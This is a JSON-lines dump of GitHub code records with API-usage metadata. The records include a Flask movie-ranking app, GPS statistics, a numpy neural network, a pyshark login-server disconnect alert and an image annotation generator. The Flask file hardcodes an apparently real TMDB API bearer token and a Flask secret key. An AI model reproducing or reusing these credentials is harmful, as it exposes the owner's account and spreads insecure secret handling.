"matplotlib.pyplot.ylim", "line_number": 133, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 133, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.title", "line_number": 134, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 134, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.show", "line_number": 135, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 135, "usage_type": "name"}]} +{"seq_id": "71300193446", "text": "from flask import Flask, render_template, redirect, url_for, request\nfrom flask_bootstrap import Bootstrap\nfrom flask_sqlalchemy import SQLAlchemy\nfrom flask_wtf import FlaskForm\nfrom wtforms import StringField, FloatField, SubmitField, validators\nimport requests\n\n# CONSTANTS\nDATABASE_URL = \"https://api.themoviedb.org/3/search/movie\"\nAUTHORIZATION = \"Bearer eyJhbGciOiJIUzI1NiJ9.eyJhdWQiOiJkMmRlY2NlZWEzZTgyMzkzMDIyZTYyZDc0OGZlMTdjMyIsInN1YiI6IjY1Mjg3ZDFkMGNiMzM1MTZmODgxZjcyNiIsInNjb3BlcyI6WyJhcGlfcmVhZCJdLCJ2ZXJzaW9uIjoxfQ.L0rWPxkiQgCpPXk3Y1GbLqPgcb5eV06MvR2jG4kVUew\"\nIMAGE_URL = \"https://image.tmdb.org/t/p/w780\"\nHEADERS = {\n \"accept\": \"application/json\",\n \"Authorization\": AUTHORIZATION,\n}\n\napp = Flask(__name__)\napp.config['SECRET_KEY'] = '8BYkEfBA6O6donzWlSihBXox7C0sKR6b'\n# Configure the SQLite database, relative to the app instance folder\napp.config[\"SQLALCHEMY_DATABASE_URI\"] = \"sqlite:///top-10-movies.db\"\ndb = SQLAlchemy(app)\nBootstrap(app)\n\n\n# Define the form for adding a movie\nclass AddMovie(FlaskForm):\n movie_title = StringField('Movie Title', validators=[validators.DataRequired()])\n submit = SubmitField('Add Movie')\n\n\n# Define the form for editing a movie\nclass EditMovie(FlaskForm):\n rating = FloatField('Your Rating Out of 10 e.g. 
7.5', validators=[validators.DataRequired()])\n review = StringField('Your Review', validators=[validators.DataRequired()])\n submit = SubmitField('Done')\n\n\n# Define the \"Movie\" model for the database\nclass Movie(db.Model):\n id = db.Column(db.Integer, primary_key=True)\n title = db.Column(db.String(250), unique=True, nullable=False)\n year = db.Column(db.Integer, nullable=False)\n description = db.Column(db.String(500), nullable=False)\n rating = db.Column(db.Float, nullable=True, default=0.0)\n ranking = db.Column(db.Integer, nullable=True, default=\"None\")\n review = db.Column(db.String(250), nullable=True, default=\"None\")\n img_url = db.Column(db.String(250), nullable=False)\n\n\n# Create the database tables\nwith app.app_context():\n db.create_all()\n\n\n@app.route(\"/\")\ndef home():\n all_movies = Movie.query.order_by(Movie.rating).all()\n\n for movie in range(len(all_movies)):\n all_movies[movie].ranking = len(all_movies) - movie\n db.session.commit()\n\n return render_template(\"index.html\", movies=all_movies)\n\n\n@app.route('/add', methods=['GET', 'POST'])\ndef add():\n form = AddMovie()\n if form.validate_on_submit():\n movie_title = form.movie_title.data\n response = requests.get(url=DATABASE_URL, headers=HEADERS, params={\"query\": movie_title})\n response.raise_for_status()\n data = response.json()[\"results\"]\n return render_template('select.html', options=data)\n return render_template('add.html', form=form)\n\n\n@app.route('/find')\ndef find_movie():\n movie_id = request.args.get('id')\n if movie_id:\n url = f\"https://api.themoviedb.org/3/movie/{movie_id}\"  # details endpoint (DATABASE_URL is the search endpoint)\n response = requests.get(url=url, headers=HEADERS)\n data = response.json()\n\n new_movie = Movie(\n title=data['title'],\n year=data['release_date'].split('-')[0],\n description=data['overview'],\n img_url=IMAGE_URL + data['poster_path']\n )\n db.session.add(new_movie)\n db.session.commit()\n\n return redirect(url_for('edit', id=new_movie.id))\n\n\n@app.route('/edit', methods=['GET', 'POST'])\ndef edit():\n form = EditMovie()\n movie_id = request.args.get('id')\n movie_to_update = Movie.query.get(movie_id)\n if form.validate_on_submit():\n movie_to_update.rating = form.rating.data\n movie_to_update.review = form.review.data\n db.session.commit()\n return redirect(url_for('home'))\n return render_template('edit.html', form=form, movie=movie_to_update)\n\n\n@app.route('/delete')\ndef delete():\n movie_id = request.args.get('id')\n movie_to_delete = Movie.query.get(movie_id)\n db.session.delete(movie_to_delete)\n db.session.commit()\n\n return redirect(url_for('home'))\n\n\nif __name__ == '__main__':\n app.run(debug=True)\n", "repo_name": "Tolu792/python-projects", "sub_path": "Advanced Projects/Working with Databases/movie-project-start/main.py", "file_name": "main.py", "file_ext": "py", "file_size_in_byte": 4060, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "52", "api": [{"api_name": "flask.Flask", "line_number": 17, "usage_type": "call"}, {"api_name": "flask_sqlalchemy.SQLAlchemy", "line_number": 21, "usage_type": "call"}, {"api_name": "flask_bootstrap.Bootstrap", "line_number": 22, "usage_type": "call"}, {"api_name": "flask_wtf.FlaskForm", "line_number": 26, "usage_type": "name"}, {"api_name": "wtforms.StringField", "line_number": 27, "usage_type": "call"}, {"api_name": "wtforms.validators.DataRequired", "line_number": 27, "usage_type": "call"}, {"api_name": "wtforms.validators", "line_number": 27, "usage_type": "name"}, {"api_name": "wtforms.SubmitField",
"line_number": 28, "usage_type": "call"}, {"api_name": "flask_wtf.FlaskForm", "line_number": 32, "usage_type": "name"}, {"api_name": "wtforms.FloatField", "line_number": 33, "usage_type": "call"}, {"api_name": "wtforms.validators.DataRequired", "line_number": 33, "usage_type": "call"}, {"api_name": "wtforms.validators", "line_number": 33, "usage_type": "name"}, {"api_name": "wtforms.StringField", "line_number": 34, "usage_type": "call"}, {"api_name": "wtforms.validators.DataRequired", "line_number": 34, "usage_type": "call"}, {"api_name": "wtforms.validators", "line_number": 34, "usage_type": "name"}, {"api_name": "wtforms.SubmitField", "line_number": 35, "usage_type": "call"}, {"api_name": "flask.render_template", "line_number": 63, "usage_type": "call"}, {"api_name": "requests.get", "line_number": 71, "usage_type": "call"}, {"api_name": "flask.render_template", "line_number": 74, "usage_type": "call"}, {"api_name": "flask.render_template", "line_number": 75, "usage_type": "call"}, {"api_name": "flask.request.args.get", "line_number": 80, "usage_type": "call"}, {"api_name": "flask.request.args", "line_number": 80, "usage_type": "attribute"}, {"api_name": "flask.request", "line_number": 80, "usage_type": "name"}, {"api_name": "requests.get", "line_number": 83, "usage_type": "call"}, {"api_name": "flask.redirect", "line_number": 95, "usage_type": "call"}, {"api_name": "flask.url_for", "line_number": 95, "usage_type": "call"}, {"api_name": "flask.request.args.get", "line_number": 101, "usage_type": "call"}, {"api_name": "flask.request.args", "line_number": 101, "usage_type": "attribute"}, {"api_name": "flask.request", "line_number": 101, "usage_type": "name"}, {"api_name": "flask.redirect", "line_number": 107, "usage_type": "call"}, {"api_name": "flask.url_for", "line_number": 107, "usage_type": "call"}, {"api_name": "flask.render_template", "line_number": 108, "usage_type": "call"}, {"api_name": "flask.request.args.get", "line_number": 113, "usage_type": "call"}, {"api_name": "flask.request.args", "line_number": 113, "usage_type": "attribute"}, {"api_name": "flask.request", "line_number": 113, "usage_type": "name"}, {"api_name": "flask.redirect", "line_number": 118, "usage_type": "call"}, {"api_name": "flask.url_for", "line_number": 118, "usage_type": "call"}]} +{"seq_id": "71423322726", "text": "\"\"\"\nHelper module to compute stats on GPS tracks\n\"\"\"\nimport datetime\n\nimport numpy as np\nfrom pint import UnitRegistry\n\nEARTHS_RADIUS_IN_KM = 6371.0 # in km\n\n\nclass Stats(object):\n \"\"\" Stats object to compute common statistics for a GPS track\"\"\"\n\n def __init__(self, trackpoints):\n self.trackpoints = trackpoints\n self.units = UnitRegistry()\n self.units.define('knots = knot')\n\n @property\n def full_start_time(self) -> datetime.datetime:\n \"\"\"Get the start date and time of the track\"\"\"\n return self.trackpoints[0]['timepoint']\n\n @property\n def full_end_time(self) -> datetime.datetime:\n \"\"\"Get the end date and time of the track\"\"\"\n return self.trackpoints[-1]['timepoint']\n\n @property\n def start_time(self) -> datetime.time:\n \"\"\"Get the start time of the track\"\"\"\n return self.full_start_time.time()\n\n @property\n def start_date(self) -> datetime.date:\n \"\"\"Get the start date of the track\"\"\"\n return self.full_start_time.date()\n\n @property\n def end_time(self) -> datetime.time:\n \"\"\"Get the end time of the track\"\"\"\n return self.full_end_time.time()\n\n @property\n def duration(self) -> datetime.timedelta:\n \"\"\"Get the duration 
of the track\"\"\"\n return self.full_end_time - self.full_start_time\n\n @property\n def speeds(self) -> list:\n \"\"\"Get the speed over ground at each trackpoint\"\"\"\n return [x['sog'] * (self.units.m / self.units.s)\n for x in self.trackpoints]\n\n @property\n def max_speed(self) -> float:\n \"\"\"Get the max instantaneous speed during the track\"\"\"\n return max(self.speeds)\n\n def distances(self, method='EquirecApprox') -> list:\n \"\"\"Get the trackpoint to trackpoint distances across the track\n\n Parameters\n ----------\n method : string\n The approximation methods to use for computing distances.\n\n 'EquirecApprox' (default) uses a rectangular approximation,\n ignoring that the surface of the earth is round. Fast, but not\n as accurate, especially for longer distances between points.\n\n 'Haversine' is more accurate, but slower.\n\n 'SphLawCos' is more accurate, but slower.\n \"\"\"\n\n lats = np.radians(np.asarray([x['lat'] for x in self.trackpoints]))\n lons = np.radians(np.asarray([x['lon'] for x in self.trackpoints]))\n\n lat1 = lats[0:-1]\n lat2 = lats[1:]\n lon1 = lons[0:-1]\n lon2 = lons[1:]\n\n dlon = lon2 - lon1\n dlat = lat2 - lat1\n\n if method == 'Haversine':\n a_val = ((np.sin(dlat / 2))**2 +\n np.cos(lat1) * np.cos(lat2) * (np.sin(dlon/2))**2)\n dist = EARTHS_RADIUS_IN_KM * 2 * np.arctan2(np.sqrt(a_val),\n np.sqrt(1 - a_val))\n\n elif method == 'SphLawCos':\n dist = (np.arccos((np.sin(lat1) * np.sin(lat2)) +\n (np.cos(lat1) * np.cos(lat2) * np.cos(dlon))) *\n EARTHS_RADIUS_IN_KM)\n else:\n x_vals = (lon2-lon1) * np.cos((lat1+lat2)/2)\n y_vals = (lat2-lat1)\n dist = np.sqrt(x_vals**2 + y_vals**2) * EARTHS_RADIUS_IN_KM\n\n return dist * (self.units.m * 1000)\n\n def distance(self, method: str = 'EquirecApprox') -> float:\n \"\"\"Get the total distance covered by the track\n\n Parameters\n ----------\n method : string\n The approximation methods to use for computing distances. 
See\n `distances()` for details on the available methods.\n \"\"\"\n dist = self.distances(method)\n return np.sum(dist)\n\n def bearing(self) -> list:\n \"\"\"Calculate the instantaneous bearing between each trackpoint pair\"\"\"\n\n lats = np.deg2rad(np.asarray([x['lat'] for x in self.trackpoints]))\n lons = np.deg2rad(np.asarray([x['lon'] for x in self.trackpoints]))\n\n lat1 = lats[0:-1]\n lat2 = lats[1:]\n dlon = lons[1:] - lons[0:-1]\n\n x_vals = (np.cos(lat1) * np.sin(lat2)) \\\n - (np.sin(lat1) * np.cos(lat2) * np.cos(dlon))\n y_vals = np.sin(dlon) * np.cos(lat2)\n brn = np.rad2deg(np.arctan2(y_vals, x_vals))\n return np.mod(brn+360, 360)\n", "repo_name": "adamatus/sailtrail", "sub_path": "django/analysis/stats.py", "file_name": "stats.py", "file_ext": "py", "file_size_in_byte": 4335, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "52", "api": [{"api_name": "pint.UnitRegistry", "line_number": 17, "usage_type": "call"}, {"api_name": "datetime.datetime", "line_number": 21, "usage_type": "attribute"}, {"api_name": "datetime.datetime", "line_number": 26, "usage_type": "attribute"}, {"api_name": "datetime.time", "line_number": 31, "usage_type": "attribute"}, {"api_name": "datetime.date", "line_number": 36, "usage_type": "attribute"}, {"api_name": "datetime.time", "line_number": 41, "usage_type": "attribute"}, {"api_name": "datetime.timedelta", "line_number": 46, "usage_type": "attribute"}, {"api_name": "numpy.radians", "line_number": 78, "usage_type": "call"}, {"api_name": "numpy.asarray", "line_number": 78, "usage_type": "call"}, {"api_name": "numpy.radians", "line_number": 79, "usage_type": "call"}, {"api_name": "numpy.asarray", "line_number": 79, "usage_type": "call"}, {"api_name": "numpy.sin", "line_number": 90, "usage_type": "call"}, {"api_name": "numpy.cos", "line_number": 91, "usage_type": "call"}, {"api_name": "numpy.sin", "line_number": 91, "usage_type": "call"}, {"api_name": "numpy.arctan2", "line_number": 92, "usage_type": "call"}, {"api_name": "numpy.sqrt", "line_number": 92, "usage_type": "call"}, {"api_name": "numpy.sqrt", "line_number": 93, "usage_type": "call"}, {"api_name": "numpy.arccos", "line_number": 96, "usage_type": "call"}, {"api_name": "numpy.sin", "line_number": 96, "usage_type": "call"}, {"api_name": "numpy.cos", "line_number": 97, "usage_type": "call"}, {"api_name": "numpy.cos", "line_number": 100, "usage_type": "call"}, {"api_name": "numpy.sqrt", "line_number": 102, "usage_type": "call"}, {"api_name": "numpy.sum", "line_number": 116, "usage_type": "call"}, {"api_name": "numpy.deg2rad", "line_number": 121, "usage_type": "call"}, {"api_name": "numpy.asarray", "line_number": 121, "usage_type": "call"}, {"api_name": "numpy.deg2rad", "line_number": 122, "usage_type": "call"}, {"api_name": "numpy.asarray", "line_number": 122, "usage_type": "call"}, {"api_name": "numpy.cos", "line_number": 128, "usage_type": "call"}, {"api_name": "numpy.sin", "line_number": 128, "usage_type": "call"}, {"api_name": "numpy.sin", "line_number": 129, "usage_type": "call"}, {"api_name": "numpy.cos", "line_number": 129, "usage_type": "call"}, {"api_name": "numpy.sin", "line_number": 130, "usage_type": "call"}, {"api_name": "numpy.cos", "line_number": 130, "usage_type": "call"}, {"api_name": "numpy.rad2deg", "line_number": 131, "usage_type": "call"}, {"api_name": "numpy.arctan2", "line_number": 131, "usage_type": "call"}, {"api_name": "numpy.mod", "line_number": 132, "usage_type": "call"}]} +{"seq_id": "38534493389", "text": "import 
numpy as np\nimport matplotlib.pyplot as plt\nimport seaborn as sns\nsns.set()\nfrom sklearn.utils import shuffle\nfrom utils import get_binary_data, initialise_weights_biases, relu, sigmoid, sigmoid_cost, error_rate\n\nclass ANN(object):\n    def __init__(self, hidden_units):\n        self.hidden_units = hidden_units\n\n    def fit(self, Xtrain, Ytrain, learning_rate=1e-6, reg=1.0, epochs=10000, show_fig=False):\n        Xtrain, Ytrain = shuffle(Xtrain, Ytrain)\n        Xvalid, Yvalid = Xtrain[-1000:], Ytrain[-1000:]\n        Xtrain, Ytrain = Xtrain[:-1000], Ytrain[:-1000]\n        \n        _, D = Xtrain.shape\n        self.W1, self.b1 = initialise_weights_biases(D, self.hidden_units)\n        self.W2, self.b2 = initialise_weights_biases(self.hidden_units, 1)\n\n        costs = []\n        best_validation_error = 1\n        \n        for i in range(epochs):\n            \n            # Forward propagation\n            pY, Z = self.forward(Xtrain)\n\n            # Gradient Descent\n            deltaY = pY - Ytrain\n            self.W2 -= learning_rate * (Z.T.dot(deltaY) + reg * self.W2)\n            self.b2 -= learning_rate * ((deltaY).sum() + reg * self.b2)\n\n            dZ = np.outer(deltaY, self.W2) * (Z > 0) # derivative of relu\n\n            self.W1 -= learning_rate * (Xtrain.T.dot(dZ) + reg * self.W1)\n            self.b1 -= learning_rate * (np.sum(dZ, axis=0) + reg * self.b1)\n\n            if i % 20 == 0:\n                pY_validation, _ = self.forward(Xvalid)\n                cost = sigmoid_cost(Yvalid, pY_validation)\n                costs.append(cost)\n                error = error_rate(Yvalid, np.round(pY_validation))\n                print(\"Epochs: {} | Cost: {} | Error Rate: {}\".format(i, cost, error))\n                if error < best_validation_error:\n                    best_validation_error = error\n\n        print(\"Best Validation Error: \", best_validation_error)\n\n        if show_fig:\n            plt.plot(costs)\n            plt.title('Costs')\n            plt.xlabel(\"Epochs\")\n            plt.ylabel(\"Cost/Epoch\")\n            plt.show()\n\n    def forward(self, X):\n        Z = relu(X.dot(self.W1) + self.b1)\n        return sigmoid(Z.dot(self.W2) + self.b2), Z\n\n    def predict(self, X):\n        pY, _ = self.forward(X)\n        return np.round(pY)\n\n    def score(self, X, Y):\n        prediction = self.predict(X)\n        return 1 - error_rate(Y, prediction)\n\ndef main():\n    Xtrain, Ytrain, Xtest, Ytest = get_binary_data(Ntest=1000, balance_class_one=True)\n    model = ANN(100)\n\n    model.fit(Xtrain, Ytrain, show_fig=True)\n\n    print(\"Test Score: \", model.score(Xtest, Ytest))\n\nif __name__ == '__main__':\n    main()\n\n\n", "repo_name": "AndreiRoibu/NeuralNetwoks", "sub_path": "facial_expression_recognition/neural_network_sigmoid.py", "file_name": "neural_network_sigmoid.py", "file_ext": "py", "file_size_in_byte": 2634, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "52", "api": [{"api_name": "seaborn.set", "line_number": 4, "usage_type": "call"}, {"api_name": "sklearn.utils.shuffle", "line_number": 13, "usage_type": "call"}, {"api_name": "utils.initialise_weights_biases", "line_number": 18, "usage_type": "call"}, {"api_name": "utils.initialise_weights_biases", "line_number": 19, "usage_type": "call"}, {"api_name": "numpy.outer", "line_number": 34, "usage_type": "call"}, {"api_name": "numpy.sum", "line_number": 37, "usage_type": "call"}, {"api_name": "utils.sigmoid_cost", "line_number": 41, "usage_type": "call"}, {"api_name": "utils.error_rate", "line_number": 43, "usage_type": "call"}, {"api_name": "numpy.round", "line_number": 43, "usage_type": "call"}, {"api_name": "matplotlib.pyplot.plot", "line_number": 51, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 51, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.title", "line_number": 52, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", 
"line_number": 52, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.xlabel", "line_number": 53, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 53, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.ylabel", "line_number": 54, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 54, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.show", "line_number": 55, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 55, "usage_type": "name"}, {"api_name": "utils.relu", "line_number": 58, "usage_type": "call"}, {"api_name": "utils.sigmoid", "line_number": 59, "usage_type": "call"}, {"api_name": "numpy.round", "line_number": 63, "usage_type": "call"}, {"api_name": "utils.error_rate", "line_number": 67, "usage_type": "call"}, {"api_name": "utils.get_binary_data", "line_number": 70, "usage_type": "call"}]} +{"seq_id": "13876040891", "text": "import json\n\n\nclass Configuration:\n # class of configuration data\n\n # loads configuration from JSON file from provided path\n def __init__(self, filepath):\n self.data = None\n with open(filepath) as json_file:\n self.data = json.load(json_file)\n", "repo_name": "piaskowyk/enroll-timetable", "sub_path": "config_tools/configuration.py", "file_name": "configuration.py", "file_ext": "py", "file_size_in_byte": 276, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 2, "dataset": "github-code", "pt": "52", "api": [{"api_name": "json.load", "line_number": 11, "usage_type": "call"}]} +{"seq_id": "23766156756", "text": "# ffxiv login server: 204.2.229.9\nimport pyshark\nimport winsound\nimport time\nimport logging\nimport sys\n\nlogging.basicConfig(stream=sys.stdout, level=logging.DEBUG)\nlogger = logging.getLogger(__name__)\n\n# define human readable names for filters\nFFXIV_LOGIN_SERVER = \"204.2.229.9\"\nfrom_login_server = f\"ip.src=={FFXIV_LOGIN_SERVER}\"\ninitiates_closing_connection = \"tcp.connection.fin_active\"\n\n\ndef sniff_continuously(interface, display_filter):\n logger.info(f\"Listening on interface: {interface}\")\n logger.info(f\"Using display filter: {display_filter}\")\n capture = pyshark.LiveCapture(\n interface=interface,\n display_filter=display_filter\n )\n\n for packet in capture.sniff_continuously():\n # Skip is packet is too small for reconnect\n logger.info(\"Packet arrived, playing audio\")\n logger.debug(packet)\n for i in range(0, 5):\n winsound.PlaySound(\"SystemHand\", winsound.SND_ALIAS)\n time.sleep(1)\n\n\nif __name__ == '__main__':\n sniff_continuously(\n interface=\"Ethernet\",\n display_filter=f\"({from_login_server})&&({initiates_closing_connection})\"\n # display_filter=\"\",\n )\n", "repo_name": "Sillocan/ffxiv-2002-checker", "sub_path": "src/ffxiv-pyshark.py", "file_name": "ffxiv-pyshark.py", "file_ext": "py", "file_size_in_byte": 1170, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "52", "api": [{"api_name": "logging.basicConfig", "line_number": 8, "usage_type": "call"}, {"api_name": "sys.stdout", "line_number": 8, "usage_type": "attribute"}, {"api_name": "logging.DEBUG", "line_number": 8, "usage_type": "attribute"}, {"api_name": "logging.getLogger", "line_number": 9, "usage_type": "call"}, {"api_name": "pyshark.LiveCapture", "line_number": 20, "usage_type": "call"}, {"api_name": "winsound.PlaySound", "line_number": 30, "usage_type": "call"}, {"api_name": "winsound.SND_ALIAS", "line_number": 30, "usage_type": "attribute"}, {"api_name": "time.sleep", "line_number": 31, 
"usage_type": "call"}]} +{"seq_id": "70842863205", "text": "from django.urls import path\n\nfrom . import views\n\nurlpatterns = [\n path('', views.post_home, name='post_home'),\n path('posts/', views.all_posts, name='allposts'),\n path(\"post/new/\", views.create_post, name=\"create_post\"),\n path('members/', views.members, name='members'),\n path('member/new/', views.become_member, name='new_member'),\n path('testimonies/', views.testimonies, name='testimonies'),\n path('testimony/new/', views.create_testimony, name='new_testimony'),\n path('feedbacks/', views.feedbacks, name='feedbacks'),\n path('feedback/new/', views.create_feedback, name='new_feedback'),\n path('about/', views.about, name='about'),\n path('search/', views.search_queries, name='search'),\n]\n", "repo_name": "gabrielstonedelza/food4thought", "sub_path": "f4t/urls.py", "file_name": "urls.py", "file_ext": "py", "file_size_in_byte": 726, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "52", "api": [{"api_name": "django.urls.path", "line_number": 6, "usage_type": "call"}, {"api_name": "django.urls.path", "line_number": 7, "usage_type": "call"}, {"api_name": "django.urls.path", "line_number": 8, "usage_type": "call"}, {"api_name": "django.urls.path", "line_number": 9, "usage_type": "call"}, {"api_name": "django.urls.path", "line_number": 10, "usage_type": "call"}, {"api_name": "django.urls.path", "line_number": 11, "usage_type": "call"}, {"api_name": "django.urls.path", "line_number": 12, "usage_type": "call"}, {"api_name": "django.urls.path", "line_number": 13, "usage_type": "call"}, {"api_name": "django.urls.path", "line_number": 14, "usage_type": "call"}, {"api_name": "django.urls.path", "line_number": 15, "usage_type": "call"}, {"api_name": "django.urls.path", "line_number": 16, "usage_type": "call"}]} +{"seq_id": "6972069630", "text": "import cv2\nfrom random import randint\nimport xml.etree.cElementTree as ET\nimport numpy as np\nimport random\n\ndef image_genearte(ragne_images,range_sign):\n\titeration = 1\n\tname_folder_images = 'images/'\n\tname_folder_sign = 'allroadsign/'\n\tnormal_folder = 'data_image/'\n\t\n\tnum_range = int(ragne_images / range_sign)\n\tsecond_iteration = 0 \n\titer_sign = 1 \n\n\tfor i in range(range_sign):\n\t\tprint(i)\n\t\tfor j in range(second_iteration,num_range):\t\t\n\t\t\timg_size_annots_h = np.random.random_integers(100,200) \n\t\t\timg_size_annots_w = np.random.random_integers(100,200)\n\t\t\timg_size =(800,800)\n\t\t\timg_size_annots = (img_size_annots_h,img_size_annots_w)\n\t\t\t\n\t\t\timage = cv2.imread(name_folder_images+str(iteration)+'.jpg')\n\t\t\timage_sign = cv2.imread(name_folder_sign+str(iter_sign)+'.jpg')\n\n\t\t\tnew_image = cv2.resize(image,img_size)\n\n\t\t\tnew_image_sign = cv2.resize(image_sign,img_size_annots)\n\n\t\t\tsign = new_image_sign\n\t\t\timage = new_image\n\n\t\t\tradnom_down = np.random.random_integers(200,400) \n\t\t\trandom_raght = np.random.random_integers(200,400) \n\t\t\timage[img_size_annots[0] + radnom_down:img_size_annots[0]+radnom_down+sign.shape[0], img_size_annots[1]+random_raght:img_size_annots[1]+random_raght+sign.shape[1]] = sign \n\t\t\tcv2.imwrite(normal_folder+str(iteration)+'.jpg',image)\n\t\t\t\n\t\t\timg_width,img_height= img_size\n\t\t\timg_depth = 3\n\n\t\t\trectangles = [\n\t\t\timg_size_annots[0] + radnom_down,\n\t\t\timg_size_annots[0] * 2,\n\t\t\timg_size_annots[0],\n\t\t\timg_size_annots[1] * 3\n\t\t\t]\n\t\t\t\n\t\t\tname =str(iteration)+'.jpg'\n\t\t\timg_filename = 
(name)\n\n\t\t\tname_folder = \"images\"\n\t\t\tpath = \"/home/ostap/Documents/LNU/kiberg/Vision/test/images/\" +str(iteration)+ \".jpg\"\n\t\t\tdatabase = \"Unknown\"\n\t\t\tsegmented = 0\n\t\t\tname_obj = \"stop\"\n\t\t\tpose = \"Unspecified\"\n\t\t\tfruncated = 0\n\t\t\tdifficult = 0\n\t\t\txmin_add = np.random.random_integers(0,10)\n\t\t\tymin_add = np.random.random_integers(0,10)\n\t\t\txmax_add = np.random.random_integers(0,10)\n\t\t\tymax_add = np.random.random_integers(0,10)\n\t\t\txmin = img_size_annots[1] + random_raght + img_size_annots_h + xmin_add\n\t\t\txmax = img_size_annots[1] + random_raght + xmax_add\n\t\t\tymax = img_size_annots[0] + radnom_down + ymax_add\n\t\t\tymin = img_size_annots[0] + radnom_down + img_size_annots_w + ymin_add\n\t\t\tprint(xmin, \"\\t\",ymin,\"\\t\",xmax,\"\\t\",ymax)\n\t\t\tprint(\"==================================\")\n\t\t\twith open(\"data_annots/\"+str(iteration)+\".xml\",\"w+\") as f :\n\t\t\t\tf.write(\"<annotation>\")\n\t\t\t\tf.write(\"\\n\\t<folder>\" + name_folder + \"</folder>\")\n\t\t\t\tf.write(\"\\n\\t<filename>\" + str(iteration)+ \".jpg\" + \"</filename>\")\n\t\t\t\tf.write(\"\\n\\t<path>\" + path + \"</path>\")\t\n\t\t\t\tf.write(\"\\n\\t<source>\")\t\n\t\t\t\tf.write(\"\\n\\t\\t<database>\" + database +\"</database>\")\n\t\t\t\tf.write(\"\\n\\t</source>\")\n\t\t\t\tf.write(\"\\n\\t<size>\")\t\n\t\t\t\tf.write(\"\\n\\t\\t<width>\" + str(img_width) + \"</width>\")\n\t\t\t\tf.write(\"\\n\\t\\t<height>\" + str(img_height) + \"</height>\")\n\t\t\t\tf.write(\"\\n\\t\\t<depth>\" + str(img_depth) + \"</depth>\")\n\t\t\t\tf.write(\"\\n\\t</size>\")\n\t\t\t\tf.write(\"\\n\\t<segmented>\" + str(segmented) + \"</segmented>\")\n\t\t\t\tf.write(\"\\n\\t<object>\")\n\t\t\t\tf.write(\"\\n\\t\\t<name>\" + name_obj + \"</name>\")\t\n\t\t\t\tf.write(\"\\n\\t\\t<pose>\" + pose + \"</pose>\")\n\t\t\t\tf.write(\"\\n\\t\\t<truncated>\" + str(fruncated) + \"</truncated>\")\n\t\t\t\tf.write(\"\\n\\t\\t<difficult>\" + str(difficult) + \"</difficult>\")\n\t\t\t\tf.write(\"\\n\\t\\t<bndbox>\")\n\t\t\t\tf.write(\"\\n\\t\\t\\t<xmin>\" + str(xmin) + \"</xmin>\")\n\t\t\t\tf.write(\"\\n\\t\\t\\t<ymin>\" + str(ymin) + \"</ymin>\")\n\t\t\t\tf.write(\"\\n\\t\\t\\t<xmax>\" + str(xmax) + \"</xmax>\")\n\t\t\t\tf.write(\"\\n\\t\\t\\t<ymax>\" + str(ymax) + \"</ymax>\")\n\t\t\t\tf.write(\"\\n\\t\\t</bndbox>\")\n\t\t\t\tf.write(\"\\n\\t</object>\")\n\t\t\t\tf.write(\"\\n</annotation>\") \n\t\t\t\tf.close()\n\t\t\titeration+=1\n\t\t\tnum_range +=1\t\n\t\t\tsecond_iteration +=1\n\t\t\t\n\t\titer_sign +=1\n\nimage_genearte(2000,6)\n\n#print(np.random.random_integers(0,10))\n\n\n\nwith open(\"1.xml\",\"w\") as f:\n\tf.write(r\"101\")\n\tf.write(r\"101\")\n\tf.write(r\"101\")\n\tf.write(r\"101\")\n\nwith open(\"2.xml\",\"w\") as f:\n\tf.write(str(np.random.random_integers(100,200)))\n\tf.write(str(np.random.random_integers(100,200)))\n\tf.write(str(np.random.random_integers(100,200)))\n\tf.write(str(np.random.random_integers(100,200)))\n", "repo_name": "ragnariock/test_test_files_from_sign_stop", "sub_path": "generateImage.py", "file_name": "generateImage.py", "file_ext": "py", "file_size_in_byte": 4055, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "52", "api": [{"api_name": "numpy.random.random_integers", "line_number": 20, "usage_type": "call"}, {"api_name": "numpy.random", "line_number": 20, "usage_type": "attribute"}, {"api_name": "numpy.random.random_integers", "line_number": 21, "usage_type": "call"}, {"api_name": "numpy.random", "line_number": 21, "usage_type": "attribute"}, {"api_name": "cv2.imread", "line_number": 25, "usage_type": "call"}, {"api_name": "cv2.imread", "line_number": 26, "usage_type": "call"}, {"api_name": "cv2.resize", "line_number": 28, "usage_type": "call"}, {"api_name": "cv2.resize", "line_number": 30, "usage_type": "call"}, {"api_name": "numpy.random.random_integers", "line_number": 35, "usage_type": "call"}, {"api_name": "numpy.random", "line_number": 35, "usage_type": "attribute"}, {"api_name": "numpy.random.random_integers", "line_number": 36, "usage_type": "call"}, {"api_name": "numpy.random", "line_number": 36, "usage_type": "attribute"}, {"api_name": "cv2.imwrite", "line_number": 38, "usage_type": "call"}, {"api_name": "numpy.random.random_integers", "line_number": 61, "usage_type": "call"}, {"api_name": "numpy.random", "line_number": 61, "usage_type": "attribute"}, {"api_name": "numpy.random.random_integers", "line_number": 62, "usage_type": "call"}, {"api_name": "numpy.random", "line_number": 62, "usage_type": "attribute"}, {"api_name": "numpy.random.random_integers", "line_number": 63, "usage_type": "call"}, {"api_name": "numpy.random", "line_number": 63, "usage_type": "attribute"}, {"api_name": "numpy.random.random_integers", "line_number": 64, "usage_type": "call"}, {"api_name": "numpy.random", "line_number": 64, "usage_type": "attribute"}, {"api_name": "numpy.random.random_integers", 